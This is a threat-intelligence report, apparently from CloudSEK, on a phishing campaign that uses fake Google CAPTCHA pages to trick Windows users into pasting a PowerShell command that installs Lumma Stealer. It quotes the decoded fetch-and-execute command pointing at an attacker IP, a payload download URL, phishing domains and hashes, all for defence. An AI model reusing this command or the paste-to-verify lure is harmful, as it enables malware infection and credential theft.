Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages | CloudSEK

Summary: A sophisticated phishing campaign has been identified that distributes Lumma Stealer malware through deceptive human verification pages targeting Windows users. This method leverages clipboard manipulation and PowerShell commands to execute the malware, posing a significant threat to unsuspecting victims.

Threat Actor: Unknown | Lumma Stealer
Victim: Windows Users | Windows Users

Key Point :

  • Phishing sites mimic Google CAPTCHA to trick users into executing malicious commands.
  • Base64-encoded PowerShell commands are used to download Lumma Stealer from remote servers.
  • Malicious pages have been found on various platforms, including Amazon S3 and CDN providers.
  • Users are encouraged to be wary of copying and pasting unknown commands to avoid infection.
  • Robust endpoint protection and regular system updates are recommended to mitigate risks.

Category: Adversary Intelligence

Industry: Multiple

Motivation: Cyber Crime/Financial

Region: Global

TLP: GEEEN

Executive Summary

A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto Networks, has prompted further investigation into similar malicious sites.

After our investigation, we have identified more active malicious sites spreading the Lumma Stealer. It’s important to note that while this technique is currently being used to distribute Lumma Stealer, it could potentially be leveraged to deliver any type of malicious malware to unsuspecting users. 

Flow of the Phishing Campaign and Malware Infection

Analysis and Attribution

Modus Operandi

Threat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks (CDNs). These sites present users with a fake Google CAPTCHA page.

  • Upon clicking the “Verify” button, users are presented with unusual instructions:some text
    • Open the Run dialog (Win+R)
    • Press Ctrl+V
    • Hit Enter
  • Unbeknownst to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard.
  • The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.

Technical Analysis

Our research team identified multiple domains hosting these malicious verification pages. The infection chain typically follows this pattern:

  • User visits the fake verification page
Phishing Page Prompting deceptive Google Captcha Verification prompt

  • PowerShell script is copied on the clipboard via the Clicking on the “I’m not a robot” button. Once inspecting the source code of the phishing sites can also reveal the command which is being copied.
Verifications steps asked by the deceptive sites

  • Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC
  • The decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, will fetch the content from the a.txt file hosted on the remote server. This content will then be parsed and executed using Invoke-Expression.
  • The a.txt file contains additional commands to download the Lumma Stealer onto the victim’s device, hosted at: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip 

Further commands on a.txt to download the malicious file

  • If the downloaded file(dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer will become operational and establish connections with attacker-controlled domains.

Notable Observations

  • Malicious pages were found on various platforms, including Amazon S3 buckets and CDN providers
  • The use of base64 encoding and clipboard manipulation demonstrates the attackers’ efforts to evade detection
  • The initial executable often downloads additional components, complicating analysis and potentially allowing for modular functionality
  • Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.

Recommendations

  • Educate Employees/Users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.
  • Implement and maintain robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
  • Monitor network traffic for suspicious connections to newly registered or uncommon domains.
  • Regularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer malware.

Malicious Fake URLs

  • hxxps[://]heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html
  • hxxps[://]fipydslaongos[.]b-cdn[.]net/please-verify-z[.]html
  • hxxps[://]sdkjhfdskjnck[.]s3[.]amazonaws[.]com/human-verify-system[.]html
  • hxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html
  • hxxps[://]pub-9c4ec7f3f95c448b85e464d2b533aac1[.]r2[.]dev/human-verify-system[.]html
  • hxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html
  • hxxps[://]newvideozones[.]click/veri[.]html
  • hxxps[://]ch3[.]dlvideosfre[.]click/human-verify-system[.]html
  • hxxps[://]newvideozones[.]click/veri[.]html
  • hxxps[://]ofsetvideofre[.]click

Type | Name | Value

File | dengo.zip | 7c348f51d383d6587e2beac5ff79bef2e66c31d7

IP | Downloader Server IP | 165.227.121.41

PE Exec File | tr7 | e002696bb7d57315b352844cebc031e18e89f29e

PE Exec File | 2ndhsoru |766c266506918b467bf35db701c9b0954a616b58

References

Appendix

Lumma Stealer Malware-as-a-Service Page

CloudSEK TRIAD

CloudSEK Threat Research and Information Analytics Division

Source: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages